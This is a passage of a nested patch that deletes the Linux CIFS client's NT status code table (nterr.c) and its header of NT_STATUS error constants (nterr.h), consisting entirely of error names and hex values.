+-	 NT_STATUS_DISK_OPERATION_FAILED},
+-	{"NT_STATUS_DISK_RESET_FAILED", NT_STATUS_DISK_RESET_FAILED},
+-	{"NT_STATUS_SHARED_IRQ_BUSY", NT_STATUS_SHARED_IRQ_BUSY},
+-	{"NT_STATUS_FT_ORPHANING", NT_STATUS_FT_ORPHANING},
+-	{"NT_STATUS_PARTITION_FAILURE", NT_STATUS_PARTITION_FAILURE},
+-	{"NT_STATUS_INVALID_BLOCK_LENGTH", NT_STATUS_INVALID_BLOCK_LENGTH},
+-	{"NT_STATUS_DEVICE_NOT_PARTITIONED",
+-	 NT_STATUS_DEVICE_NOT_PARTITIONED},
+-	{"NT_STATUS_UNABLE_TO_LOCK_MEDIA", NT_STATUS_UNABLE_TO_LOCK_MEDIA},
+-	{"NT_STATUS_UNABLE_TO_UNLOAD_MEDIA",
+-	 NT_STATUS_UNABLE_TO_UNLOAD_MEDIA},
+-	{"NT_STATUS_EOM_OVERFLOW", NT_STATUS_EOM_OVERFLOW},
+-	{"NT_STATUS_NO_MEDIA", NT_STATUS_NO_MEDIA},
+-	{"NT_STATUS_NO_SUCH_MEMBER", NT_STATUS_NO_SUCH_MEMBER},
+-	{"NT_STATUS_INVALID_MEMBER", NT_STATUS_INVALID_MEMBER},
+-	{"NT_STATUS_KEY_DELETED", NT_STATUS_KEY_DELETED},
+-	{"NT_STATUS_NO_LOG_SPACE", NT_STATUS_NO_LOG_SPACE},
+-	{"NT_STATUS_TOO_MANY_SIDS", NT_STATUS_TOO_MANY_SIDS},
+-	{"NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED",
+-	 NT_STATUS_LM_CROSS_ENCRYPTION_REQUIRED},
+-	{"NT_STATUS_KEY_HAS_CHILDREN", NT_STATUS_KEY_HAS_CHILDREN},
+-	{"NT_STATUS_CHILD_MUST_BE_VOLATILE",
+-	 NT_STATUS_CHILD_MUST_BE_VOLATILE},
+-	{"NT_STATUS_DEVICE_CONFIGURATION_ERROR",
+-	 NT_STATUS_DEVICE_CONFIGURATION_ERROR},
+-	{"NT_STATUS_DRIVER_INTERNAL_ERROR",
+-	 NT_STATUS_DRIVER_INTERNAL_ERROR},
+-	{"NT_STATUS_INVALID_DEVICE_STATE", NT_STATUS_INVALID_DEVICE_STATE},
+-	{"NT_STATUS_IO_DEVICE_ERROR", NT_STATUS_IO_DEVICE_ERROR},
+-	{"NT_STATUS_DEVICE_PROTOCOL_ERROR",
+-	 NT_STATUS_DEVICE_PROTOCOL_ERROR},
+-	{"NT_STATUS_BACKUP_CONTROLLER", NT_STATUS_BACKUP_CONTROLLER},
+-	{"NT_STATUS_LOG_FILE_FULL", NT_STATUS_LOG_FILE_FULL},
+-	{"NT_STATUS_TOO_LATE", NT_STATUS_TOO_LATE},
+-	{"NT_STATUS_NO_TRUST_LSA_SECRET", NT_STATUS_NO_TRUST_LSA_SECRET},
+-	{"NT_STATUS_NO_TRUST_SAM_ACCOUNT", NT_STATUS_NO_TRUST_SAM_ACCOUNT},
+-	{"NT_STATUS_TRUSTED_DOMAIN_FAILURE",
+-	 NT_STATUS_TRUSTED_DOMAIN_FAILURE},
+-	{"NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE",
+-	 NT_STATUS_TRUSTED_RELATIONSHIP_FAILURE},
+-	{"NT_STATUS_EVENTLOG_FILE_CORRUPT",
+-	 NT_STATUS_EVENTLOG_FILE_CORRUPT},
+-	{"NT_STATUS_EVENTLOG_CANT_START", NT_STATUS_EVENTLOG_CANT_START},
+-	{"NT_STATUS_TRUST_FAILURE", NT_STATUS_TRUST_FAILURE},
+-	{"NT_STATUS_MUTANT_LIMIT_EXCEEDED",
+-	 NT_STATUS_MUTANT_LIMIT_EXCEEDED},
+-	{"NT_STATUS_NETLOGON_NOT_STARTED", NT_STATUS_NETLOGON_NOT_STARTED},
+-	{"NT_STATUS_ACCOUNT_EXPIRED", NT_STATUS_ACCOUNT_EXPIRED},
+-	{"NT_STATUS_POSSIBLE_DEADLOCK", NT_STATUS_POSSIBLE_DEADLOCK},
+-	{"NT_STATUS_NETWORK_CREDENTIAL_CONFLICT",
+-	 NT_STATUS_NETWORK_CREDENTIAL_CONFLICT},
+-	{"NT_STATUS_REMOTE_SESSION_LIMIT", NT_STATUS_REMOTE_SESSION_LIMIT},
+-	{"NT_STATUS_EVENTLOG_FILE_CHANGED",
+-	 NT_STATUS_EVENTLOG_FILE_CHANGED},
+-	{"NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT",
+-	 NT_STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT},
+-	{"NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT",
+-	 NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT},
+-	{"NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT",
+-	 NT_STATUS_NOLOGON_SERVER_TRUST_ACCOUNT},
+-	{"NT_STATUS_DOMAIN_TRUST_INCONSISTENT",
+-	 NT_STATUS_DOMAIN_TRUST_INCONSISTENT},
+-	{"NT_STATUS_FS_DRIVER_REQUIRED", NT_STATUS_FS_DRIVER_REQUIRED},
+-	{"NT_STATUS_NO_USER_SESSION_KEY", NT_STATUS_NO_USER_SESSION_KEY},
+-	{"NT_STATUS_USER_SESSION_DELETED", NT_STATUS_USER_SESSION_DELETED},
+-	{"NT_STATUS_RESOURCE_LANG_NOT_FOUND",
+-	 NT_STATUS_RESOURCE_LANG_NOT_FOUND},
+-	{"NT_STATUS_INSUFF_SERVER_RESOURCES",
+-	 NT_STATUS_INSUFF_SERVER_RESOURCES},
+-	{"NT_STATUS_INVALID_BUFFER_SIZE", NT_STATUS_INVALID_BUFFER_SIZE},
+-	{"NT_STATUS_INVALID_ADDRESS_COMPONENT",
+-	 NT_STATUS_INVALID_ADDRESS_COMPONENT},
+-	{"NT_STATUS_INVALID_ADDRESS_WILDCARD",
+-	 NT_STATUS_INVALID_ADDRESS_WILDCARD},
+-	{"NT_STATUS_TOO_MANY_ADDRESSES", NT_STATUS_TOO_MANY_ADDRESSES},
+-	{"NT_STATUS_ADDRESS_ALREADY_EXISTS",
+-	 NT_STATUS_ADDRESS_ALREADY_EXISTS},
+-	{"NT_STATUS_ADDRESS_CLOSED", NT_STATUS_ADDRESS_CLOSED},
+-	{"NT_STATUS_CONNECTION_DISCONNECTED",
+-	 NT_STATUS_CONNECTION_DISCONNECTED},
+-	{"NT_STATUS_CONNECTION_RESET", NT_STATUS_CONNECTION_RESET},
+-	{"NT_STATUS_TOO_MANY_NODES", NT_STATUS_TOO_MANY_NODES},
+-	{"NT_STATUS_TRANSACTION_ABORTED", NT_STATUS_TRANSACTION_ABORTED},
+-	{"NT_STATUS_TRANSACTION_TIMED_OUT",
+-	 NT_STATUS_TRANSACTION_TIMED_OUT},
+-	{"NT_STATUS_TRANSACTION_NO_RELEASE",
+-	 NT_STATUS_TRANSACTION_NO_RELEASE},
+-	{"NT_STATUS_TRANSACTION_NO_MATCH", NT_STATUS_TRANSACTION_NO_MATCH},
+-	{"NT_STATUS_TRANSACTION_RESPONDED",
+-	 NT_STATUS_TRANSACTION_RESPONDED},
+-	{"NT_STATUS_TRANSACTION_INVALID_ID",
+-	 NT_STATUS_TRANSACTION_INVALID_ID},
+-	{"NT_STATUS_TRANSACTION_INVALID_TYPE",
+-	 NT_STATUS_TRANSACTION_INVALID_TYPE},
+-	{"NT_STATUS_NOT_SERVER_SESSION", NT_STATUS_NOT_SERVER_SESSION},
+-	{"NT_STATUS_NOT_CLIENT_SESSION", NT_STATUS_NOT_CLIENT_SESSION},
+-	{"NT_STATUS_CANNOT_LOAD_REGISTRY_FILE",
+-	 NT_STATUS_CANNOT_LOAD_REGISTRY_FILE},
+-	{"NT_STATUS_DEBUG_ATTACH_FAILED", NT_STATUS_DEBUG_ATTACH_FAILED},
+-	{"NT_STATUS_SYSTEM_PROCESS_TERMINATED",
+-	 NT_STATUS_SYSTEM_PROCESS_TERMINATED},
+-	{"NT_STATUS_DATA_NOT_ACCEPTED", NT_STATUS_DATA_NOT_ACCEPTED},
+-	{"NT_STATUS_NO_BROWSER_SERVERS_FOUND",
+-	 NT_STATUS_NO_BROWSER_SERVERS_FOUND},
+-	{"NT_STATUS_VDM_HARD_ERROR", NT_STATUS_VDM_HARD_ERROR},
+-	{"NT_STATUS_DRIVER_CANCEL_TIMEOUT",
+-	 NT_STATUS_DRIVER_CANCEL_TIMEOUT},
+-	{"NT_STATUS_REPLY_MESSAGE_MISMATCH",
+-	 NT_STATUS_REPLY_MESSAGE_MISMATCH},
+-	{"NT_STATUS_MAPPED_ALIGNMENT", NT_STATUS_MAPPED_ALIGNMENT},
+-	{"NT_STATUS_IMAGE_CHECKSUM_MISMATCH",
+-	 NT_STATUS_IMAGE_CHECKSUM_MISMATCH},
+-	{"NT_STATUS_LOST_WRITEBEHIND_DATA",
+-	 NT_STATUS_LOST_WRITEBEHIND_DATA},
+-	{"NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID",
+-	 NT_STATUS_CLIENT_SERVER_PARAMETERS_INVALID},
+-	{"NT_STATUS_PASSWORD_MUST_CHANGE", NT_STATUS_PASSWORD_MUST_CHANGE},
+-	{"NT_STATUS_NOT_FOUND", NT_STATUS_NOT_FOUND},
+-	{"NT_STATUS_NOT_TINY_STREAM", NT_STATUS_NOT_TINY_STREAM},
+-	{"NT_STATUS_RECOVERY_FAILURE", NT_STATUS_RECOVERY_FAILURE},
+-	{"NT_STATUS_STACK_OVERFLOW_READ", NT_STATUS_STACK_OVERFLOW_READ},
+-	{"NT_STATUS_FAIL_CHECK", NT_STATUS_FAIL_CHECK},
+-	{"NT_STATUS_DUPLICATE_OBJECTID", NT_STATUS_DUPLICATE_OBJECTID},
+-	{"NT_STATUS_OBJECTID_EXISTS", NT_STATUS_OBJECTID_EXISTS},
+-	{"NT_STATUS_CONVERT_TO_LARGE", NT_STATUS_CONVERT_TO_LARGE},
+-	{"NT_STATUS_RETRY", NT_STATUS_RETRY},
+-	{"NT_STATUS_FOUND_OUT_OF_SCOPE", NT_STATUS_FOUND_OUT_OF_SCOPE},
+-	{"NT_STATUS_ALLOCATE_BUCKET", NT_STATUS_ALLOCATE_BUCKET},
+-	{"NT_STATUS_PROPSET_NOT_FOUND", NT_STATUS_PROPSET_NOT_FOUND},
+-	{"NT_STATUS_MARSHALL_OVERFLOW", NT_STATUS_MARSHALL_OVERFLOW},
+-	{"NT_STATUS_INVALID_VARIANT", NT_STATUS_INVALID_VARIANT},
+-	{"NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND",
+-	 NT_STATUS_DOMAIN_CONTROLLER_NOT_FOUND},
+-	{"NT_STATUS_ACCOUNT_LOCKED_OUT", NT_STATUS_ACCOUNT_LOCKED_OUT},
+-	{"NT_STATUS_HANDLE_NOT_CLOSABLE", NT_STATUS_HANDLE_NOT_CLOSABLE},
+-	{"NT_STATUS_CONNECTION_REFUSED", NT_STATUS_CONNECTION_REFUSED},
+-	{"NT_STATUS_GRACEFUL_DISCONNECT", NT_STATUS_GRACEFUL_DISCONNECT},
+-	{"NT_STATUS_ADDRESS_ALREADY_ASSOCIATED",
+-	 NT_STATUS_ADDRESS_ALREADY_ASSOCIATED},
+-	{"NT_STATUS_ADDRESS_NOT_ASSOCIATED",
+-	 NT_STATUS_ADDRESS_NOT_ASSOCIATED},
+-	{"NT_STATUS_CONNECTION_INVALID", NT_STATUS_CONNECTION_INVALID},
+-	{"NT_STATUS_CONNECTION_ACTIVE", NT_STATUS_CONNECTION_ACTIVE},
+-	{"NT_STATUS_NETWORK_UNREACHABLE", NT_STATUS_NETWORK_UNREACHABLE},
+-	{"NT_STATUS_HOST_UNREACHABLE", NT_STATUS_HOST_UNREACHABLE},
+-	{"NT_STATUS_PROTOCOL_UNREACHABLE", NT_STATUS_PROTOCOL_UNREACHABLE},
+-	{"NT_STATUS_PORT_UNREACHABLE", NT_STATUS_PORT_UNREACHABLE},
+-	{"NT_STATUS_REQUEST_ABORTED", NT_STATUS_REQUEST_ABORTED},
+-	{"NT_STATUS_CONNECTION_ABORTED", NT_STATUS_CONNECTION_ABORTED},
+-	{"NT_STATUS_BAD_COMPRESSION_BUFFER",
+-	 NT_STATUS_BAD_COMPRESSION_BUFFER},
+-	{"NT_STATUS_USER_MAPPED_FILE", NT_STATUS_USER_MAPPED_FILE},
+-	{"NT_STATUS_AUDIT_FAILED", NT_STATUS_AUDIT_FAILED},
+-	{"NT_STATUS_TIMER_RESOLUTION_NOT_SET",
+-	 NT_STATUS_TIMER_RESOLUTION_NOT_SET},
+-	{"NT_STATUS_CONNECTION_COUNT_LIMIT",
+-	 NT_STATUS_CONNECTION_COUNT_LIMIT},
+-	{"NT_STATUS_LOGIN_TIME_RESTRICTION",
+-	 NT_STATUS_LOGIN_TIME_RESTRICTION},
+-	{"NT_STATUS_LOGIN_WKSTA_RESTRICTION",
+-	 NT_STATUS_LOGIN_WKSTA_RESTRICTION},
+-	{"NT_STATUS_IMAGE_MP_UP_MISMATCH", NT_STATUS_IMAGE_MP_UP_MISMATCH},
+-	{"NT_STATUS_INSUFFICIENT_LOGON_INFO",
+-	 NT_STATUS_INSUFFICIENT_LOGON_INFO},
+-	{"NT_STATUS_BAD_DLL_ENTRYPOINT", NT_STATUS_BAD_DLL_ENTRYPOINT},
+-	{"NT_STATUS_BAD_SERVICE_ENTRYPOINT",
+-	 NT_STATUS_BAD_SERVICE_ENTRYPOINT},
+-	{"NT_STATUS_LPC_REPLY_LOST", NT_STATUS_LPC_REPLY_LOST},
+-	{"NT_STATUS_IP_ADDRESS_CONFLICT1", NT_STATUS_IP_ADDRESS_CONFLICT1},
+-	{"NT_STATUS_IP_ADDRESS_CONFLICT2", NT_STATUS_IP_ADDRESS_CONFLICT2},
+-	{"NT_STATUS_REGISTRY_QUOTA_LIMIT", NT_STATUS_REGISTRY_QUOTA_LIMIT},
+-	{"NT_STATUS_PATH_NOT_COVERED", NT_STATUS_PATH_NOT_COVERED},
+-	{"NT_STATUS_NO_CALLBACK_ACTIVE", NT_STATUS_NO_CALLBACK_ACTIVE},
+-	{"NT_STATUS_LICENSE_QUOTA_EXCEEDED",
+-	 NT_STATUS_LICENSE_QUOTA_EXCEEDED},
+-	{"NT_STATUS_PWD_TOO_SHORT", NT_STATUS_PWD_TOO_SHORT},
+-	{"NT_STATUS_PWD_TOO_RECENT", NT_STATUS_PWD_TOO_RECENT},
+-	{"NT_STATUS_PWD_HISTORY_CONFLICT", NT_STATUS_PWD_HISTORY_CONFLICT},
+-	{"NT_STATUS_PLUGPLAY_NO_DEVICE", NT_STATUS_PLUGPLAY_NO_DEVICE},
+-	{"NT_STATUS_UNSUPPORTED_COMPRESSION",
+-	 NT_STATUS_UNSUPPORTED_COMPRESSION},
+-	{"NT_STATUS_INVALID_HW_PROFILE", NT_STATUS_INVALID_HW_PROFILE},
+-	{"NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH",
+-	 NT_STATUS_INVALID_PLUGPLAY_DEVICE_PATH},
+-	{"NT_STATUS_DRIVER_ORDINAL_NOT_FOUND",
+-	 NT_STATUS_DRIVER_ORDINAL_NOT_FOUND},
+-	{"NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND",
+-	 NT_STATUS_DRIVER_ENTRYPOINT_NOT_FOUND},
+-	{"NT_STATUS_RESOURCE_NOT_OWNED", NT_STATUS_RESOURCE_NOT_OWNED},
+-	{"NT_STATUS_TOO_MANY_LINKS", NT_STATUS_TOO_MANY_LINKS},
+-	{"NT_STATUS_QUOTA_LIST_INCONSISTENT",
+-	 NT_STATUS_QUOTA_LIST_INCONSISTENT},
+-	{"NT_STATUS_FILE_IS_OFFLINE", NT_STATUS_FILE_IS_OFFLINE},
+-	{"NT_STATUS_NO_MORE_ENTRIES", NT_STATUS_NO_MORE_ENTRIES},
+-	{"NT_STATUS_MORE_ENTRIES", NT_STATUS_MORE_ENTRIES},
+-	{"NT_STATUS_SOME_UNMAPPED", NT_STATUS_SOME_UNMAPPED},
+-	{NULL, 0}
+-};
+diff --git a/fs/cifs/nterr.h b/fs/cifs/nterr.h
+deleted file mode 100644
+index edd4741cab0a1..0000000000000
+--- a/fs/cifs/nterr.h
++++ /dev/null
+@@ -1,551 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+-   Unix SMB/Netbios implementation.
+-   Version 1.9.
+-   NT error code constants
+-   Copyright (C) Andrew Tridgell              1992-2000
+-   Copyright (C) John H Terpstra              1996-2000
+-   Copyright (C) Luke Kenneth Casson Leighton 1996-2000
+-   Copyright (C) Paul Ashton                  1998-2000
+-
+-*/
+-
+-
+-
+-#ifndef _NTERR_H
+-#define _NTERR_H
+-
+-struct nt_err_code_struct {
+-	char *nt_errstr;
+-	__u32 nt_errcode;
+-};
+-
+-extern const struct nt_err_code_struct nt_errs[];
+-
+-/* Win32 Status codes. */
+-#define NT_STATUS_MORE_ENTRIES         0x0105
+-#define NT_ERROR_INVALID_PARAMETER     0x0057
+-#define NT_ERROR_INSUFFICIENT_BUFFER   0x007a
+-#define NT_STATUS_1804                 0x070c
+-#define NT_STATUS_NOTIFY_ENUM_DIR      0x010c
+-
+-/*
+- * Win32 Error codes extracted using a loop in smbclient then printing a netmon
+- * sniff to a file.
+- */
+-
+-#define NT_STATUS_OK                   0x0000
+-#define NT_STATUS_SOME_UNMAPPED        0x0107
+-#define NT_STATUS_BUFFER_OVERFLOW  0x80000005
+-#define NT_STATUS_NO_MORE_ENTRIES  0x8000001a
+-#define NT_STATUS_MEDIA_CHANGED    0x8000001c
+-#define NT_STATUS_END_OF_MEDIA     0x8000001e
+-#define NT_STATUS_MEDIA_CHECK      0x80000020
+-#define NT_STATUS_NO_DATA_DETECTED 0x8000001c
+-#define NT_STATUS_STOPPED_ON_SYMLINK 0x8000002d
+-#define NT_STATUS_DEVICE_REQUIRES_CLEANING 0x80000288
+-#define NT_STATUS_DEVICE_DOOR_OPEN 0x80000288
+-#define NT_STATUS_UNSUCCESSFUL 0xC0000000 | 0x0001
+-#define NT_STATUS_NOT_IMPLEMENTED 0xC0000000 | 0x0002
+-#define NT_STATUS_INVALID_INFO_CLASS 0xC0000000 | 0x0003
+-#define NT_STATUS_INFO_LENGTH_MISMATCH 0xC0000000 | 0x0004
+-#define NT_STATUS_ACCESS_VIOLATION 0xC0000000 | 0x0005
+-#define NT_STATUS_IN_PAGE_ERROR 0xC0000000 | 0x0006
+-#define NT_STATUS_PAGEFILE_QUOTA 0xC0000000 | 0x0007
+-#define NT_STATUS_INVALID_HANDLE 0xC0000000 | 0x0008
+-#define NT_STATUS_BAD_INITIAL_STACK 0xC0000000 | 0x0009
+-#define NT_STATUS_BAD_INITIAL_PC 0xC0000000 | 0x000a
+-#define NT_STATUS_INVALID_CID 0xC0000000 | 0x000b
+-#define NT_STATUS_TIMER_NOT_CANCELED 0xC0000000 | 0x000c
+-#define NT_STATUS_INVALID_PARAMETER 0xC0000000 | 0x000d
+-#define NT_STATUS_NO_SUCH_DEVICE 0xC0000000 | 0x000e
+-#define NT_STATUS_NO_SUCH_FILE 0xC0000000 | 0x000f
+-#define NT_STATUS_INVALID_DEVICE_REQUEST 0xC0000000 | 0x0010
+-#define NT_STATUS_END_OF_FILE 0xC0000000 | 0x0011
+-#define NT_STATUS_WRONG_VOLUME 0xC0000000 | 0x0012
+-#define NT_STATUS_NO_MEDIA_IN_DEVICE 0xC0000000 | 0x0013
+-#define NT_STATUS_UNRECOGNIZED_MEDIA 0xC0000000 | 0x0014
+-#define NT_STATUS_NONEXISTENT_SECTOR 0xC0000000 | 0x0015
+-#define NT_STATUS_MORE_PROCESSING_REQUIRED 0xC0000000 | 0x0016
+-#define NT_STATUS_NO_MEMORY 0xC0000000 | 0x0017
+-#define NT_STATUS_CONFLICTING_ADDRESSES 0xC0000000 | 0x0018
+-#define NT_STATUS_NOT_MAPPED_VIEW 0xC0000000 | 0x0019
+-#define NT_STATUS_UNABLE_TO_FREE_VM 0x80000000 | 0x001a
+-#define NT_STATUS_UNABLE_TO_DELETE_SECTION 0xC0000000 | 0x001b
+-#define NT_STATUS_INVALID_SYSTEM_SERVICE 0xC0000000 | 0x001c
+-#define NT_STATUS_ILLEGAL_INSTRUCTION 0xC0000000 | 0x001d
+-#define NT_STATUS_INVALID_LOCK_SEQUENCE 0xC0000000 | 0x001e
+-#define NT_STATUS_INVALID_VIEW_SIZE 0xC0000000 | 0x001f
+-#define NT_STATUS_INVALID_FILE_FOR_SECTION 0xC0000000 | 0x0020
+-#define NT_STATUS_ALREADY_COMMITTED 0xC0000000 | 0x0021
+-#define NT_STATUS_ACCESS_DENIED 0xC0000000 | 0x0022
+-#define NT_STATUS_BUFFER_TOO_SMALL 0xC0000000 | 0x0023
+-#define NT_STATUS_OBJECT_TYPE_MISMATCH 0xC0000000 | 0x0024
+-#define NT_STATUS_NONCONTINUABLE_EXCEPTION 0xC0000000 | 0x0025
+-#define NT_STATUS_INVALID_DISPOSITION 0xC0000000 | 0x0026
+-#define NT_STATUS_UNWIND 0xC0000000 | 0x0027
+-#define NT_STATUS_BAD_STACK 0xC0000000 | 0x0028
+-#define NT_STATUS_INVALID_UNWIND_TARGET 0xC0000000 | 0x0029
+-#define NT_STATUS_NOT_LOCKED 0xC0000000 | 0x002a
+-#define NT_STATUS_PARITY_ERROR 0xC0000000 | 0x002b
+-#define NT_STATUS_UNABLE_TO_DECOMMIT_VM 0xC0000000 | 0x002c
+-#define NT_STATUS_NOT_COMMITTED 0xC0000000 | 0x002d
+-#define NT_STATUS_INVALID_PORT_ATTRIBUTES 0xC0000000 | 0x002e
+-#define NT_STATUS_PORT_MESSAGE_TOO_LONG 0xC0000000 | 0x002f
+-#define NT_STATUS_INVALID_PARAMETER_MIX 0xC0000000 | 0x0030
+-#define NT_STATUS_INVALID_QUOTA_LOWER 0xC0000000 | 0x0031
+-#define NT_STATUS_DISK_CORRUPT_ERROR 0xC0000000 | 0x0032
+-#define NT_STATUS_OBJECT_NAME_INVALID 0xC0000000 | 0x0033
+-#define NT_STATUS_OBJECT_NAME_NOT_FOUND 0xC0000000 | 0x0034
+-#define NT_STATUS_OBJECT_NAME_COLLISION 0xC0000000 | 0x0035
+-#define NT_STATUS_HANDLE_NOT_WAITABLE 0xC0000000 | 0x0036
+-#define NT_STATUS_PORT_DISCONNECTED 0xC0000000 | 0x0037
+-#define NT_STATUS_DEVICE_ALREADY_ATTACHED 0xC0000000 | 0x0038
+-#define NT_STATUS_OBJECT_PATH_INVALID 0xC0000000 | 0x0039
+-#define NT_STATUS_OBJECT_PATH_NOT_FOUND 0xC0000000 | 0x003a
+-#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD 0xC0000000 | 0x003b
+-#define NT_STATUS_DATA_OVERRUN 0xC0000000 | 0x003c
+-#define NT_STATUS_DATA_LATE_ERROR 0xC0000000 | 0x003d
+-#define NT_STATUS_DATA_ERROR 0xC0000000 | 0x003e
+-#define NT_STATUS_CRC_ERROR 0xC0000000 | 0x003f
+-#define NT_STATUS_SECTION_TOO_BIG 0xC0000000 | 0x0040
+-#define NT_STATUS_PORT_CONNECTION_REFUSED 0xC0000000 | 0x0041
+-#define NT_STATUS_INVALID_PORT_HANDLE 0xC0000000 | 0x0042
+-#define NT_STATUS_SHARING_VIOLATION 0xC0000000 | 0x0043
+-#define NT_STATUS_QUOTA_EXCEEDED 0xC0000000 | 0x0044
+-#define NT_STATUS_INVALID_PAGE_PROTECTION 0xC0000000 | 0x0045
+-#define NT_STATUS_MUTANT_NOT_OWNED 0xC0000000 | 0x0046
+-#define NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED 0xC0000000 | 0x0047
+-#define NT_STATUS_PORT_ALREADY_SET 0xC0000000 | 0x0048
+-#define NT_STATUS_SECTION_NOT_IMAGE 0xC0000000 | 0x0049
+-#define NT_STATUS_SUSPEND_COUNT_EXCEEDED 0xC0000000 | 0x004a
+-#define NT_STATUS_THREAD_IS_TERMINATING 0xC0000000 | 0x004b
+-#define NT_STATUS_BAD_WORKING_SET_LIMIT 0xC0000000 | 0x004c
+-#define NT_STATUS_INCOMPATIBLE_FILE_MAP 0xC0000000 | 0x004d
+-#define NT_STATUS_SECTION_PROTECTION 0xC0000000 | 0x004e
+-#define NT_STATUS_EAS_NOT_SUPPORTED 0xC0000000 | 0x004f
+-#define NT_STATUS_EA_TOO_LARGE 0xC0000000 | 0x0050
+-#define NT_STATUS_NONEXISTENT_EA_ENTRY 0xC0000000 | 0x0051
+-#define NT_STATUS_NO_EAS_ON_FILE 0xC0000000 | 0x0052
+-#define NT_STATUS_EA_CORRUPT_ERROR 0xC0000000 | 0x0053
+-#define NT_STATUS_FILE_LOCK_CONFLICT 0xC0000000 | 0x0054
+-#define NT_STATUS_LOCK_NOT_GRANTED 0xC0000000 | 0x0055
+-#define NT_STATUS_DELETE_PENDING 0xC0000000 | 0x0056
+-#define NT_STATUS_CTL_FILE_NOT_SUPPORTED 0xC0000000 | 0x0057
+-#define NT_STATUS_UNKNOWN_REVISION 0xC0000000 | 0x0058
+-#define NT_STATUS_REVISION_MISMATCH 0xC0000000 | 0x0059
+-#define NT_STATUS_INVALID_OWNER 0xC0000000 | 0x005a
+-#define NT_STATUS_INVALID_PRIMARY_GROUP 0xC0000000 | 0x005b
+-#define NT_STATUS_NO_IMPERSONATION_TOKEN 0xC0000000 | 0x005c
+-#define NT_STATUS_CANT_DISABLE_MANDATORY 0xC0000000 | 0x005d
+-#define NT_STATUS_NO_LOGON_SERVERS 0xC0000000 | 0x005e
+-#define NT_STATUS_NO_SUCH_LOGON_SESSION 0xC0000000 | 0x005f
+-#define NT_STATUS_NO_SUCH_PRIVILEGE 0xC0000000 | 0x0060
+-#define NT_STATUS_PRIVILEGE_NOT_HELD 0xC0000000 | 0x0061
+-#define NT_STATUS_INVALID_ACCOUNT_NAME 0xC0000000 | 0x0062
+-#define NT_STATUS_USER_EXISTS 0xC0000000 | 0x0063
+-#define NT_STATUS_NO_SUCH_USER 0xC0000000 | 0x0064
+-#define NT_STATUS_GROUP_EXISTS 0xC0000000 | 0x0065
+-#define NT_STATUS_NO_SUCH_GROUP 0xC0000000 | 0x0066
+-#define NT_STATUS_MEMBER_IN_GROUP 0xC0000000 | 0x0067
+-#define NT_STATUS_MEMBER_NOT_IN_GROUP 0xC0000000 | 0x0068
+-#define NT_STATUS_LAST_ADMIN 0xC0000000 | 0x0069
+-#define NT_STATUS_WRONG_PASSWORD 0xC0000000 | 0x006a
+-#define NT_STATUS_ILL_FORMED_PASSWORD 0xC0000000 | 0x006b
+-#define NT_STATUS_PASSWORD_RESTRICTION 0xC0000000 | 0x006c
+-#define NT_STATUS_LOGON_FAILURE 0xC0000000 | 0x006d
+-#define NT_STATUS_ACCOUNT_RESTRICTION 0xC0000000 | 0x006e
+-#define NT_STATUS_INVALID_LOGON_HOURS 0xC0000000 | 0x006f
+-#define NT_STATUS_INVALID_WORKSTATION 0xC0000000 | 0x0070
+-#define NT_STATUS_PASSWORD_EXPIRED 0xC0000000 | 0x0071
+-#define NT_STATUS_ACCOUNT_DISABLED 0xC0000000 | 0x0072
+-#define NT_STATUS_NONE_MAPPED 0xC0000000 | 0x0073
+-#define NT_STATUS_TOO_MANY_LUIDS_REQUESTED 0xC0000000 | 0x0074
+-#define NT_STATUS_LUIDS_EXHAUSTED 0xC0000000 | 0x0075
+-#define NT_STATUS_INVALID_SUB_AUTHORITY 0xC0000000 | 0x0076
+-#define NT_STATUS_INVALID_ACL 0xC0000000 | 0x0077
+-#define NT_STATUS_INVALID_SID 0xC0000000 | 0x0078
+-#define NT_STATUS_INVALID_SECURITY_DESCR 0xC0000000 | 0x0079
+-#define NT_STATUS_PROCEDURE_NOT_FOUND 0xC0000000 | 0x007a
+-#define NT_STATUS_INVALID_IMAGE_FORMAT 0xC0000000 | 0x007b
+-#define NT_STATUS_NO_TOKEN 0xC0000000 | 0x007c
+-#define NT_STATUS_BAD_INHERITANCE_ACL 0xC0000000 | 0x007d
+-#define NT_STATUS_RANGE_NOT_LOCKED 0xC0000000 | 0x007e
+-#define NT_STATUS_DISK_FULL 0xC0000000 | 0x007f
+-#define NT_STATUS_SERVER_DISABLED 0xC0000000 | 0x0080
+-#define NT_STATUS_SERVER_NOT_DISABLED 0xC0000000 | 0x0081
+-#define NT_STATUS_TOO_MANY_GUIDS_REQUESTED 0xC0000000 | 0x0082
+-#define NT_STATUS_GUIDS_EXHAUSTED 0xC0000000 | 0x0083
+-#define NT_STATUS_INVALID_ID_AUTHORITY 0xC0000000 | 0x0084
+-#define NT_STATUS_AGENTS_EXHAUSTED 0xC0000000 | 0x0085
+-#define NT_STATUS_INVALID_VOLUME_LABEL 0xC0000000 | 0x0086
+-#define NT_STATUS_SECTION_NOT_EXTENDED 0xC0000000 | 0x0087
+-#define NT_STATUS_NOT_MAPPED_DATA 0xC0000000 | 0x0088
+-#define NT_STATUS_RESOURCE_DATA_NOT_FOUND 0xC0000000 | 0x0089
+-#define NT_STATUS_RESOURCE_TYPE_NOT_FOUND 0xC0000000 | 0x008a
+-#define NT_STATUS_RESOURCE_NAME_NOT_FOUND 0xC0000000 | 0x008b
+-#define NT_STATUS_ARRAY_BOUNDS_EXCEEDED 0xC0000000 | 0x008c
+-#define NT_STATUS_FLOAT_DENORMAL_OPERAND 0xC0000000 | 0x008d
+-#define NT_STATUS_FLOAT_DIVIDE_BY_ZERO 0xC0000000 | 0x008e
+-#define NT_STATUS_FLOAT_INEXACT_RESULT 0xC0000000 | 0x008f
+-#define NT_STATUS_FLOAT_INVALID_OPERATION 0xC0000000 | 0x0090
